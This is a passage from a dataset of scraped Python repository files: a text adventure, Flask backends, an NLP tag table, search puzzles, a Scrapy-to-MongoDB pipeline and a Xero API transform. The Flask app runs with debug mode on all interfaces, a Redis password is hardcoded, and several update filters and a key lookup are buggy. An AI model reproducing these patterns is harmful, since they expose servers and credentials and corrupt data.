Room',\n 'item' : 'cookie',\n }\n }\n\n#start the player in the Hall\ncurrentRoom = 'Crew Stasis Bay 9'\n\nshowInstructions()\noxy = int(101)\n#loop forever\nwhile True:\n oxy -= 2\n showStatus()\n\n #get the player's next 'move'\n #.split() breaks it up into an list array\n #eg typing 'go east' would give the list:\n #['go','east']\n move = ''\n while move == '':\n move = input('>')\n\n # split allows an items to have a space on them\n # get golden key is returned [\"get\", \"golden key\"] \n move = move.lower().split(\" \", 1)\n\n #if they type 'go' first\n\n#if player looks for something\n if move[0] == 'look':\n objects(move[1])\n else:\n print(\"It's not worth looking at\")\n\n #if they type 'get' first\n if move[0] == 'get':\n #if the room contains an item, and the item is the one they want to get\n if 'item' in rooms[currentRoom] and move[1] in rooms[currentRoom]['item']:\n #add the item to their inventory\n inventory += [move[1]]\n #display a helpful message\n print(move[1] + ' got!')\n #delete the item from the room\n del rooms[currentRoom]['item']\n #otherwise, if the item isn't there to get\n else:\n #tell them they can't get it\n print('Can\\'t get ' + move[1] + '!')\n \n ## Define how a player can win\n if currentRoom == 'bridge' and 'key' in inventory and 'potion' in inventory:\n print('You push the button and the whole ship trembles as it is pulled towards a wonderous destinations...YOU WIN!!')\n break\n\n ## If player gets hurt enough times\n if body <= 0:\n print(\"Your body is unable to sustain any more damage...you die.\")\n break\n ## If a player runs out of air\n elif oxy <= 0:\n print('gasping for air, darkness creeps in from the edges of your vision... 
GAME OVER!')\n break\n","repo_name":"jimlabbe/mycode","sub_path":"week2/spacegame.py","file_name":"spacegame.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32442878084","text":"from flask import Flask, request, jsonify\nfrom flask_restful import Resource, Api\nfrom flask_cors import CORS\nimport json\n\nimport requests\n\n\napp = Flask(__name__)\napi = Api(app)\nCORS(app)\n\ntodos = {}\n\n\nclass Api(Resource):\n def get(self):\n\n data = request.json\n\n res = requests.get(\n \"https://6u3td6zfza.execute-api.us-east-2.amazonaws.com/prod/user/transactions\")\n\n return res.json()\n\n def post(self):\n data = request.json\n\n res = requests.post(\n \"https://6u3td6zfza.execute-api.us-east-2.amazonaws.com/prod/user/login\", json=data)\n if res.ok:\n return {\"authenticated\": True}\n\n return {\"authenticated\": False}\n\n def put(self):\n with open(\"canceled_transactions.txt\", 'a') as f:\n f.write(json.dumps(request.json)+\"\\n\")\n return {\"canceled\": True}\n\n # def options (self):\n # return {\"Allow\" : '*/*' }, 200, \\\n # { \"Access-Control-Allow-Origin\": \"*\", \\\n # \"Access-Control-Allow-Methods\" : \"*\" }\n\n\napi.add_resource(Api, '/')\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","repo_name":"dondippino/angular-python-demo","sub_path":"backend/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31485006747","text":"# coding: utf-8\n\nclass GPOS:\n gpos_num = 61\n gpos_list = (\n 'a', # 形容词\n 'c', # 连词\n 'd', # 副词\n 'f', # 方位词\n 'i', # 成语\n 'm', # 数词\n 'n', # 普通名词\n 'nr', # 人名\n 'nx', # 外语\n 'nz', # 专有名词\n 'o', # 拟声词\n 'p', # 介词\n 'q', # 量词\n 'r', # 代词\n 't', # 时间名词\n 'u', # 助词\n 'v', # 动词\n 'w', # 标点符号\n 'y', # 语气词\n \n 'cc', # Coordinating conjunction \n 'cd', # Cardinal number\n 'colon', # \n 'comma', #\n 'dash', # \n 'dt', # Determiner\n 'ex', # Existential there \n 'fw', # Foreign Word \n 'hyphen', # \n 'in', # Preposision or subordinating conjunction\n 'jj', # Adjective \n 'jjr', # Adjective, comparative\n 'jjs', # Adjective, superlative\n 'lrb', # \n 'md', # Modal \n 'nn', # Noun, singular or mass \n 'nnp', # Proper Noun, singular \n 'nnps', # Proper Noun, plural \n 'nns', # Noun, plural \n 'pdt', # Predeterminer \n 'pos', # Possessive Ending\n 'prp', # Personal Pronoun \n 'prpg', # Possessive Pronoun \n 'rb', # Adverb \n 'rbr', # Adverb, comparative \n 'rbs', # Adverb, superlative \n 'rp', # Particle \n 'rrb', # \n 'sent', # \n 'sym', # Symbol \n 'to', # To\n 'uh', # Interjection \n 'vb', # Verb, base form \n 'vbd', # Verb, past tense \n 'vbg', # Verb, gerund or persent participle \n 'vbn', # Verb, past participle \n 'vbp', # Verb, non-3rd person singular present \n 'vbz', # Verb, 3rd person singular present \n 'wdt', # Wh-determiner \n 'wp', # Wh-pronoun \n 'wpg', # Possessive wh-pronoun \n 'wrb', # Wh-adverb\n )\n gpos_dict = {\n 'a': 0,\n 'c': 1,\n 'd': 2,\n 'f': 3,\n 'i': 4,\n 'm': 5,\n 'n': 6,\n 'nr': 7,\n 'nx': 8,\n 'nz': 9,\n 'o': 10,\n 'p': 11,\n 'q': 12,\n 'r': 13,\n 't': 14,\n 'u': 15,\n 'v': 16,\n 'w': 17,\n 'y': 18,\n \n 'cc': 19, \n 'cd': 20, \n 'colon': 21, \n 'comma': 22, \n 'dash': 23, \n 'dt': 24, \n 'ex': 25, \n 'fw': 26, \n 'hyphen': 27, \n 'in': 28, \n 'jj': 29, \n 'jjr': 30, \n 'jjs': 31, \n 'lrb': 32, \n 'md': 33, \n 'nn': 34, \n 'nnp': 35, \n 'nnps': 36, \n 'nns': 37, \n 'pdt': 
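# Predeterminer; dict indices follow gpos_list order\n        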
38, \n 'pos': 39, \n 'prp': 40, \n 'prpg': 41, \n 'rb': 42, \n 'rbr': 43, \n 'rbs': 44, \n 'rp': 45, \n 'rrb': 46, \n 'sent': 47, \n 'sym': 48, \n 'to': 49, \n 'uh': 50, \n 'vb': 51, \n 'vbd': 52, \n 'vbg': 53, \n 'vbn': 54, \n 'vbp': 55, \n 'vbz': 56, \n 'wdt': 57, \n 'wp': 58, \n 'wpg': 59, \n 'wrb': 60,\n }\n \n @staticmethod\n def gpos2idx(gpos):\n return GPOS.gpos_dict.get(gpos, GPOS.gpos_dict['n'])\n \n @staticmethod\n def idx2gpos(idx):\n if -GPOS.gpos_num <= idx < GPOS.gpos_num:\n return GPOS.gpos_list[idx]\n return 'n'\n \n @staticmethod\n def is_punc(gpos): # punctuation mark\n if gpos in ['w', 'sent', 'comma', 'dash', 'hyphen', 'colon', 'sym', 'lrb', 'rrb']:\n return True\n return False\n \n @staticmethod\n def one_hot(gpos):\n hot = [0. for _ in range(GPOS.gpos_num)]\n hot[GPOS.gpos2idx(gpos)] = 1.\n return hot\n\n\nif __name__ == \"__main__\":\n \n print(GPOS.one_hot('n'))\n \n","repo_name":"wwyuan2023/TextParser","sub_path":"textparser/utils/gpos.py","file_name":"gpos.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"10657619880","text":"# implementation of water jug problem using BFS\r\nfrom collections import deque\r\n# function to solve water jug problem using BFS Approach\r\ndef waterJug(cap1,cap2,target):\r\n # Map is used to store the states, every state is hashed to binary value to indicate either \r\n # that state is visited before or not\r\n visited = {}\r\n isSolvable = False\r\n path = []\r\n # queue to maintain states\r\n q = deque()\r\n # initializating with initial state\r\n q.append((0,0))\r\n while(len(q)>0):\r\n # current state\r\n state = q.popleft()\r\n #print(state)\r\n # If this state is already visited\r\n if(state in visited):\r\n continue\r\n # Doesn't met jug constraints\r\n if(state[0]>cap1 or state[1]>cap2 or state[0]<0 or state[1]<0):\r\n continue\r\n # Filling the vector for constructing the solution path\r\n path.append((state[0],state[1]))\r\n # Marking current state as visited\r\n visited[state] = True\r\n # If we reach the goal state\r\n if(state[0]==target[0] and state[1]==target[1]):\r\n isSolvable = True\r\n #path.append(state)\r\n print('Jug1\\tJug2')\r\n for i in range(len(path)):\r\n print(str(path[i][0])+'\\t'+str(path[i][1]))\r\n break\r\n #print(state)\r\n # fill the first jug\r\n if(state[0]0):\r\n #path.append((0,state[1]))\r\n q.append((0,state[1]))\r\n # empty the second jug\r\n if(state[1]>0):\r\n #path.append((state[0],0))\r\n q.append((state[0],0))\r\n # Pour from 1st jug to 2nd until its full\r\n if(state[0]>0 and state[0]+state[1]>=cap2):\r\n #path.append((state[0]-(cap2-state[1]),cap2))\r\n q.append((state[0]-(cap2-state[1]),cap2))\r\n # Pour from 2nd jug to 1st until its full\r\n if(state[1]>0 and state[0]+state[1]>=cap1):\r\n #path.append((cap1,state[1]-(cap1-state[0])))\r\n q.append((cap1,state[1]-(cap1-state[0])))\r\n # Pour all water from 1st to 2nd\r\n if(state[0]>0 and state[0]+state[1]<=cap2):\r\n #path.append((0,state[0]+state[1]))\r\n q.append((0,state[0]+state[1]))\r\n # Pour all water from 2nd to 1st\r\n if(state[1]>0 and state[0]+state[1]<=cap1):\r\n #path.append((state[0]+state[1],0))\r\n q.append((state[0]+state[1],0))\r\n # No, solution exists \r\n if (not isSolvable):\r\n print (\"No solution\")\r\n #print(path)\r\n #print(path)\r\nif __name__ == '__main__':\r\n cap1, cap2 = tuple(map(int,input('Enter the capacity of jug 1 and jug 2: ').split()))\r\n target = tuple(map(int,input('Enter the final capacity 
of jug1 and jug 2: ').split()))\r\n waterJug(cap1,cap2,target)","repo_name":"shaina-12/Artificial-Intelligence","sub_path":"AI/Water Jug Using BFS.py","file_name":"Water Jug Using BFS.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"38712587627","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\nimport time\n\nimport redis\nfrom pymongo import MongoClient\n\n\nclass AnchoridspiderPipeline(object):\n def process_item(self, item, spider):\n return item\n\nclass AnchoridspiderMongoDBPipeline(object):\n # collection = 'YunzkData(ku.iyunzk.com)'\n def __init__(self, mongo_uri, mongo_db, collection_dict, mongo_port):\n self.mongo_uri = mongo_uri\n self.mongo_db = mongo_db\n self.mongo_port = mongo_port\n self.collection_dict = collection_dict\n self.time_str = time.strftime(\"%Y-%m-%d\", time.localtime())\n\n @classmethod\n def from_crawler(cls, crawler):\n '''\n scrapy为我们访问settings提供了这样的一个方法,这里,\n 我们需要从settings.py文件中,取得数据库的URI和数据库名称\n '''\n return cls(\n mongo_uri=crawler.settings.get('MONGO_URI'),\n mongo_db=crawler.settings.get('MONGO_DB'),\n collection_dict=crawler.settings.get('COLLECTION'),\n mongo_port=crawler.settings.get('MONGO_PORT')\n )\n\n def open_spider(self, spider):\n print(spider.name)\n self.redis = redis.StrictRedis(host='192.168.1.45', port=6379, db=0, password='admin')\n self.client = MongoClient(self.mongo_uri, port=self.mongo_port)\n self.db = self.client[self.mongo_db]\n self.collection = self.db[self.collection_dict[spider.name]]\n\n def close_spider(self, spider):\n self.client.close()\n\n def process_item(self, item, spider):\n if spider.name == 'tb_anchor_goods':\n self.process_anchor_goods(item)\n elif spider.name == 'tb_anchor':\n self.process_anchor(item)\n elif spider.name == 'tbshop':\n self.process_id_to_redis(item)\n # self.process_anchor(item)\n elif spider.name == 'search_aid':\n self.process_id_to_redis(item)\n elif spider.name == 'aliVsessionAnchor':\n self.process_id_to_redis(item)\n self.process_anchor(item)\n elif spider.name == 'searchAnchorAnchorIdAPI':\n self.process_id_to_redis(item)\n self.process_anchor(item)\n elif spider.name == 'fansFeature':\n self.process_anchorfansFeature(item)\n elif spider.name == 'searchAnchorAPI':\n self.process_id_to_redis(item)\n self.process_anchor(item)\n elif spider.name == 'organ_info':\n self.process_organ(item)\n\n def process_anchor_goods(self, item):\n # res = self.collection.find_one({\"accountId\": item.get('accountId')})\n\n anchor = dict(item)\n anchor['accountId'] = item.get('accountId')\n anchor['accountName'] = item.get('accountName')\n anchor['title'] = item.get('title')\n anchor['createTime'] = item.get('createTime')\n anchor['itemId'] = item.get('itemId')\n anchor['sellerId'] = item.get('sellerId')\n anchor['goods_url'] = item.get('goods_url')\n anchor['shopName'] = item.get('shopName')\n anchor['liveId'] = item.get('liveId')\n anchor['liveURL'] = item.get('liveURL')\n anchor['livePrice'] = item.get('livePrice')\n anchor['categoryId'] = item.get('categoryId')\n anchor['class2name'] = item.get('class2name')\n anchor['shopId'] = item.get('shopId')\n anchor['shopType'] = item.get('shopType')\n anchor['maintype'] = item.get('maintype')\n anchor['rootCategoryId'] = item.get('rootCategoryId')\n self.collection.insert_one(anchor)\n return item\n\n 
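# The handlers below use a find-then-insert-or-update pattern; a sketch of\n    # an equivalent single-call upsert (assuming standard PyMongo semantics):\n    #   self.collection.update_one({'anchorId': str(item.get('anchorId'))},\n    #                              {'$set': data}, upsert=True)\n    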
def process_anchor(self, item):\n res = self.collection.find_one({\"anchorId\": str(item.get('anchorId'))})\n try:\n darenScore = int(item.get('darenScore'))\n except:\n darenScore = None\n\n try:\n fansCount = int(item.get('fansCount'))\n except:\n fansCount = None\n if not res:\n data = {\n\n 'anchorId': str(item.get('anchorId')),\n 'anchorName': item.get('anchorName'),\n 'houseId': None,\n 'fansCount': fansCount,\n 'liveCount': None,\n 'city': item.get('city'),\n 'creatorType': item.get('creatorType'),\n 'darenScore': darenScore,\n 'descText': item.get('descText'),\n 'anchorPhoto': item.get('anchorPhoto'),\n 'organId': item.get('organId'),\n 'fansFeature': None,\n 'historyData': None,\n 'servType': item.get('servType'),\n }\n self.collection.insert_one(data) # 插入一条不存在的主播数据\n else:\n try:\n servType = res.get('servType')\n except:\n servType = -1\n if res.get('fansCount') == fansCount and res.get('anchorPhoto') == item.get('anchorPhoto') and res.get('anchorName') == item.get('anchorName') and res.get('city') == item.get('city') and res.get('creatorType') == item.get('creatorType') and res.get('darenScore') == darenScore and res.get('organId') == item.get('organId') and servType == item.get('servType'):\n pass\n else:\n self.collection.update_one({'anchorId': str(id)},\n {'$set':\n {\n 'fansCount': fansCount,\n 'anchorName': item.get('anchorName'),\n 'city': item.get('city'),\n 'creatorType': item.get('creatorType'),\n 'darenScore': darenScore,\n 'descText': item.get('descText'),\n 'anchorPhoto': item.get('anchorPhoto'),\n 'organId': item.get('organId'),\n 'servType': item.get('servType')\n }\n }\n ) # 更新已存在的主播数据\n return item\n\n def process_anchorid(self, item):\n res = self.collection.find_one({\"anchorId\": item.get('anchorId')})\n if not res:\n data = {\n \"anchorId\": item['anchorId'],\n }\n self.collection.insert_one(data)\n return item\n\n def process_anchorfansFeature(self, item):\n res = self.collection.find_one({\"anchorId\": item.get('anchorId')})\n if not res:\n\n data = {\n \"anchorId\": str(item['anchorId']),\n 'age': item['age'],\n 'area': item['area'],\n 'career': item['career'],\n 'cate': item['cate'],\n 'gender': item['gender'],\n 'interest': item['interest']\n }\n self.collection.insert_one(data)\n else:\n if res.get('area') == item.get('area') and res.get('area') == item.get('area') and res.get('career') == item.get(\n 'career') and res.get('cate') == item.get('cate') and res.get('gender') == item.get(\n 'gender') and res.get('interest') == item.get(\n 'interest'):\n pass\n else:\n self.collection.update_one({'anchorId': str(id)},\n {'$set':\n {\n 'age': item.get('age'),\n 'area': item.get('area'),\n 'career': item.get('career'),\n 'cate': item.get('cate'),\n 'gender': item.get('gender'),\n 'interest': item.get('interest'),\n }\n }\n )\n return item\n\n def process_id_to_redis(self, item):\n self.redis.sadd('anchorId', item['anchorId'])\n return item\n\n def process_organ(self, item):\n res = self.collection.find_one({\"_id\": str(item.get('organId'))})\n try:\n darenCount = int(item.get('darenCount'))\n except:\n darenCount = None\n\n try:\n topdrenCount = int(item.get('topdrenCount'))\n except:\n topdrenCount = None\n\n try:\n compositeScore = int(item.get('compositeScore'))\n except:\n compositeScore = None\n\n if not res:\n data = {\n\n '_id': str(item.get('organId')),\n 'organText': item.get('organText'),\n 'organName': item.get('organName'),\n 'agencyPhoto': item.get('agencyPhoto'),\n 'tag': item.get('tag'),\n 'catetgory': item.get('catetgory'),\n 'darenCount': 
darenCount,\n 'topdrenCount': topdrenCount,\n 'compositeScore': compositeScore,\n 'verticalField': item.get('verticalField'),\n 'platform': 1,\n }\n self.collection.insert_one(data) # 插入一条不存在的主播数据\n else:\n if res.get('organText') == item.get('organText') and res.get('organName') == item.get('organName') and res.get(\n 'agencyPhoto') == item.get('agencyPhoto') and res.get('tag') == item.get('tag') and res.get(\n 'catetgory') == item.get('catetgory') and res.get('darenCount') == darenCount and res.get(\n 'topdrenCount') == topdrenCount and res.get('compositeScore') == compositeScore and res.get(\n 'verticalField') == item.get('verticalField'):\n pass\n else:\n self.collection.update_one({'_id': str(id)},\n {'$set':\n {\n 'organText': item.get('organText'),\n 'organName': item.get('organName'),\n 'agencyPhoto': item.get('agencyPhoto'),\n 'tag': item.get('tag'),\n 'catetgory':item.get('catetgory'),\n 'darenCount': darenCount,\n 'topdrenCount': topdrenCount,\n 'compositeScore': compositeScore,\n 'verticalField': item.get('verticalField')\n }\n }\n ) # 更新已存在的机构数据\n return item\n","repo_name":"1987128073/project","sub_path":"pinyou/AnchorIdSpider/AnchorIdSpider/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":11428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11409410426","text":"# coding=utf-8\n__author__ = 'mlaptev'\n\nif __name__ == \"__main__\":\n amount, i, number = int(input()), 0, 0\n while i < amount:\n for j in range(number):\n if i >= amount:\n break\n i += 1\n print(number, end=' ')\n number += 1\n","repo_name":"MikeLaptev/sandbox_python","sub_path":"stepic/python_basic/module2/Module2Lesson6Step8.py","file_name":"Module2Lesson6Step8.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3507500395","text":"from flask import Flask, render_template, request, jsonify\nfrom utils import get_pm25_data\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/get_pm25_data\", methods=[\"POST\"])\ndef get_pm25_data_route():\n latitude = request.json[\"latitude\"]\n longitude = request.json[\"longitude\"]\n pm25_data = get_pm25_data(latitude, longitude)\n return jsonify(pm25_data)\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"wabinyai/My_research-lab","sub_path":"src/map_predict/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41419330185","text":"\"\"\"Tic-Tac-Toe, by Al Sweigart al@inventwithpython.com\nThe classic board game.\nThis code is available at https://nostarch.com/big-book-small-python-programming\nTags: short, board game, game, two-player\"\"\"\n\nALL_SPACES = ['1', '2', '3', '4', '5', '6', '7', '8', '9']\nX, O, BLANK = 'X', 'O', ' ' # 문자열 값에 대한 상수\n\n\ndef main():\n print('Welcome to Tic-Tac-Toe!')\n gameBoard = getBlankBoard() # 틱-택-토 보드 딕셔너리를 생성한다.\n currentPlayer, nextPlayer = X, O # X가 먼저 나오고, 그 다음에 O가 나온다.\n\n while True: # 메인 게임 루프\n # 화면에 보드 표시하기:\n print(getBoardStr(gameBoard))\n\n # 사용자가 1-9 숫자를 입력할 때까지 계속 요청한다:\n move = None\n while not isValidSpace(gameBoard, move):\n print('What is {}\\'s move? 
(1-9)'.format(currentPlayer))\n move = input('> ')\n updateBoard(gameBoard, move, currentPlayer) # 턴을 진행한다.\n\n # 게임이 끝났는지 확인한다:\n if isWinner(gameBoard, currentPlayer): # 승자를 확인한다.\n print(getBoardStr(gameBoard))\n print(currentPlayer + ' has won the game!')\n break\n elif isBoardFull(gameBoard): # 무승부인지 확인한다.\n print(getBoardStr(gameBoard))\n print('The game is a tie!')\n break\n # 다음 플레이어 턴으로 바꾼다:\n currentPlayer, nextPlayer = nextPlayer, currentPlayer\n print('Thanks for playing!')\n\n\ndef getBlankBoard():\n \"\"\"비어 있는 새로운 틱-택-토 보드를 생성한다.\"\"\"\n # 빈칸에 대한 번호: 1|2|3\n # -+-+-\n # 4|5|6\n # -+-+-\n # 7|8|9\n # 키는 1부터 9이고, 값은 X, O, 또는 BLANK:\n board = {}\n for space in ALL_SPACES:\n board[space] = BLANK # 모든 칸을 빈칸으로 시작한다.\n return board\n\n\ndef getBoardStr(board):\n \"\"\"보드에 대한 텍스트를 반환한다.\"\"\"\n return '''\n {}|{}|{} 1 2 3\n -+-+-\n {}|{}|{} 4 5 6\n -+-+-\n {}|{}|{} 7 8 9'''.format(board['1'], board['2'], board['3'],\n board['4'], board['5'], board['6'],\n board['7'], board['8'], board['9'])\n\ndef isValidSpace(board, space):\n \"\"\"보드의 공백이 유효한 공백 번호고 비어 있다면\n True를 반환한다.\"\"\"\n return space in ALL_SPACES and board[space] == BLANK\n\n\ndef isWinner(board, player):\n \"\"\"플레이어가 TTT 보드의 승자라면 True를 반환한다.\"\"\"\n # 가독성을 위해 여기에 사용된 짧은 변수 이름:\n b, p = board, player\n # 행 3개, 열 3개, 대각선 2개에 걸쳐 표시가 있는지 확인한다.\n return ((b['1'] == b['2'] == b['3'] == p) or # 상단 행\n (b['4'] == b['5'] == b['6'] == p) or # 중단 행\n (b['7'] == b['8'] == b['9'] == p) or # 하단 행\n (b['1'] == b['4'] == b['7'] == p) or # 왼쪽 열\n (b['2'] == b['5'] == b['8'] == p) or # 중앙 열\n (b['3'] == b['6'] == b['9'] == p) or # 오른쪽 열\n (b['3'] == b['5'] == b['7'] == p) or # 대각선\n (b['1'] == b['5'] == b['9'] == p)) # 대각선\n\ndef isBoardFull(board):\n \"\"\"보드의 모든 공간이 채워지면 True를 반환한다.\"\"\"\n for space in ALL_SPACES:\n if board[space] == BLANK:\n return False # 만약에 빈칸이 있다면 False를 반환한다.\n return True # 빈칸이 없다면 True를 반환한다.\n\n\ndef updateBoard(board, space, mark):\n \"\"\"보드에 표시할 공간을 설정한다.\"\"\"\n board[space] = mark\n\n\nif __name__ == '__main__':\n main() # 이 모듈이 임포트되지 않고 실행된다면 main()이 호출된다.\n","repo_name":"Jpub/PyProject","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"36823188004","text":"from sklearn.datasets import make_classification, make_moons, make_gaussian_quantiles\nfrom sklearn import tree\nfrom cross_val.cross_val import cross_val_pred2ict\nfrom simplefunctions import *\nfrom imblearn.datasets import make_imbalance\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.utils import shuffle\nfrom sklearn.svm import LinearSVC, SVC\nfrom sklearn.base import clone\nfrom sklearn.model_selection import StratifiedKFold, KFold\nimport os\n\npath = os.path.dirname(os.path.abspath(__file__))\n\n# generowanie danych\ndata___, target___ = make_classification(n_samples=1500, n_features=2, n_redundant=0, n_informative=2, n_classes=2,\n weights=[0.8, 0.2], random_state=5)\ndata__, target__ = make_imbalance(data___, target___, ratio=0.1, min_c_=1, random_state=23)\ndata_, target_ = shuffle(data__, target__)\nmask = target_ == 1\n\n# liczba testow f1\nmax_iter = 500\n\n# klasyfikator\nclf = tree.DecisionTreeClassifier()\n\n# sprawdzian krzyzowy\nfolds = [StratifiedKFold(n_splits=10, random_state=5), KFold(n_splits=10, random_state=5)]\nname_folds = ['Stratified CV, k=10', 'Unstratified CV, k=10']\n\n# wykres\nfig1 = plt.figure(facecolor='white', figsize=(7.532, 
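# canvas size in inches (width x height) for the 2x2 subplot grid below\n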
6))\nplt.rc('font', **{'family': 'sans-serif', 'sans-serif': ['Helvetica'], 'size': 10})\nplt.rc('legend', fontsize=10)\n## for Palatino and other serif fonts use:\n# rc('font',**{'family':'serif','serif':['Palatino']})\n\n\nfor id, (fold, name) in enumerate(zip(folds, name_folds)):\n print('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\n print(name)\n stdtpfp = []\n stdprere = []\n stdavg = []\n ftpfpall = []\n fprereall = []\n favgall = []\n\n # badanie zaleznosci miary f1 w stosunku do ilosci przykladow kl. mniejszosciowej\n for miniority in np.arange(1, 11, 1):\n\n max_items = miniority * 10\n\n # wybor 1000 obserwacji\n idx_maj = np.where(~mask)[0][:1000 - max_items]\n idx_min = np.where(mask)[0][:max_items]\n idx = np.concatenate((idx_min, idx_maj), axis=0)\n\n data, target = data_[idx, :], target_[idx]\n\n items = np.bincount(target)\n\n ftpfp = []\n fprere = []\n favg = []\n\n # powtarzanie iteracji\n for r in range(max_iter):\n # print(r)\n # klonowanie klasyfikatora\n clf_ = clone(clf)\n data_re, target_re = shuffle(data, target)\n skf = fold\n predictions = []\n targets = []\n\n # sprawdzian krzyzowy\n for train_index, test_index in skf.split(data_re, target_re):\n clf_train_ = clone(clf)\n\n clf_train_.fit(data_re[train_index], target_re[train_index])\n predictions.append(clf_train_.predict(data_re[test_index]))\n targets.append(target_re[test_index])\n\n # obliczanie f1\n f1 = f1_calculate(predictions, targets)\n ftpfp.append(f1[0])\n fprere.append(f1[1])\n favg.append(f1[2])\n\n # obliczanie std i sredniej\n stdtpfp.append(np.std(ftpfp))\n stdprere.append(np.std(fprere))\n stdavg.append(np.std(favg))\n\n ftpfpall.append(np.mean(ftpfp))\n fprereall.append(np.mean(fprere))\n favgall.append(np.mean(favg))\n print('----------------------------------')\n print('%s%% klasy mniejszosciowej' % miniority)\n print('')\n print('F1 TP FP = %s, od. std. = %s' % (np.mean(ftpfp), np.std(ftpfp)))\n print('F1 PR RE = %s, od. std. = %s' % (np.mean(fprere), np.std(fprere)))\n print('F1 AVG = %s, od. std. = %s' % (np.mean(favg), np.std(favg)))\n print('')\n\n # wyswietlanie wykresow\n if id == 0:\n ax1 = plt.subplot(2, 2, 1 + id)\n else:\n ax2 = plt.subplot(2, 2, 1 + id, sharey=ax1)\n plt.plot([x for x in range(1, 11)], stdtpfp, 's-', lw=2, label=\"F1 TP FP FN\")\n plt.plot([x for x in range(1, 11)], stdprere, 'p-', lw=2, label=\"F1 PR RE\")\n plt.plot([x for x in range(1, 11)], stdavg, '*-', lw=2, label=\"F1 AVG\")\n if id == 0:\n plt.ylabel('Odchylenie standardowe')\n plt.xlabel('Procent klasy mniejszosciowej')\n plt.xlim(0.8, 10.2)\n plt.title('Od. std. 
F1, %s' % name)\n plt.legend(loc=\"upper right\")\n\n if id == 0:\n ax3 = plt.subplot(2, 2, 3 + id, sharex=ax1)\n else:\n ax4 = plt.subplot(2, 2, 3 + id, sharex=ax2, sharey=ax3)\n plt.plot([x for x in range(1, 11)], ftpfpall, 's-', lw=2, label=\"F1 TP FP FN\")\n plt.plot([x for x in range(1, 11)], fprereall, 'p-', lw=2, label=\"F1 PRE RE\")\n plt.plot([x for x in range(1, 11)], favgall, '*-', lw=2, label=\"F1 AVG\")\n if id == 0:\n plt.ylabel('Miara F1')\n plt.xlabel('Procent klasy mniejszosciowej')\n plt.xlim(0.8, 10.2)\n plt.title('Miara F1, %s' % name)\n plt.legend(loc=\"lower right\")\nplt.tight_layout()\nplt.savefig(os.path.join(path, 'wyniki/wykresy_zdjecia/miara-F1.png'), dpi=120)\nfig1.show()\nraw_input()\n","repo_name":"kob22/pracamgr","sub_path":"tests/test_f1.py","file_name":"test_f1.py","file_ext":"py","file_size_in_byte":4928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70341722408","text":"from xero.pipeline.interface import Pipeline\nfrom xero.pipeline.utils import parse_timestamp\nfrom xero.pipeline.headers import timeframe\n\npipeline = Pipeline(\n name=\"BankTransactions\",\n headers_fn=timeframe,\n uri=\"api.xro/2.0/BankTransactions\",\n res_fn=lambda x: x[\"BankTransactions\"],\n transform=lambda rows: [\n {\n \"Contact\": {\n \"ContactID\": row[\"Contact\"].get(\"ContactID\"),\n }\n if row.get(\"Contact\")\n else {},\n \"DateString\": row.get(\"DateString\"),\n \"Status\": row.get(\"Status\"),\n \"LineAmountTypes\": row.get(\"LineAmountTypes\"),\n \"LineItems\": [\n {\n \"Description\": line_item.get(\"Description\"),\n \"UnitAmount\": line_item.get(\"UnitAmount\"),\n \"TaxType\": line_item.get(\"TaxType\"),\n \"TaxAmount\": line_item.get(\"TaxAmount\"),\n \"LineAmount\": line_item.get(\"LineAmount\"),\n \"AccountCode\": line_item.get(\"AccountCode\"),\n \"Quantity\": line_item.get(\"Quantity\"),\n \"LineItemID\": line_item.get(\"LineItemID\"),\n }\n for line_item in row[\"LineItems\"]\n ]\n if row.get(\"LineItems\")\n else [],\n \"SubTotal\": row.get(\"SubTotal\"),\n \"TotalTax\": row.get(\"TotalTax\"),\n \"Total\": row.get('\"Total\"'),\n \"UpdatedDateUTC\": parse_timestamp(row.get(\"UpdatedDateUTC\")),\n \"CurrencyCode\": row.get(\"CurrencyCode\"),\n \"BankTransactionID\": row.get(\"BankTransactionID\"),\n \"BankAccount\": {\n \"AccountID\": row[\"BankAccount\"].get(\"AccountID\"),\n \"Code\": row[\"BankAccount\"].get(\"Code\"),\n \"Name\": row[\"BankAccount\"].get(\"Name\"),\n }\n if row.get(\"BankAccount\")\n else {},\n \"BatchPayment\": {\n \"Account\": {\n \"AccountID\": row[\"BatchPayment\"][\"Account\"].get(\"AccountID\"),\n }\n if row[\"BatchPayment\"].get(\"Account\")\n else {},\n \"BatchPaymentID\": row[\"BatchPayment\"].get(\"BatchPaymentID\"),\n \"Date\": row[\"BatchPayment\"].get(\"Date\"),\n \"Type\": row[\"BatchPayment\"].get(\"Type\"),\n \"Status\": row[\"BatchPayment\"].get(\"Status\"),\n \"TotalAmount\": row[\"BatchPayment\"].get(\"TotalAmount\"),\n \"UpdatedDateUTC\": 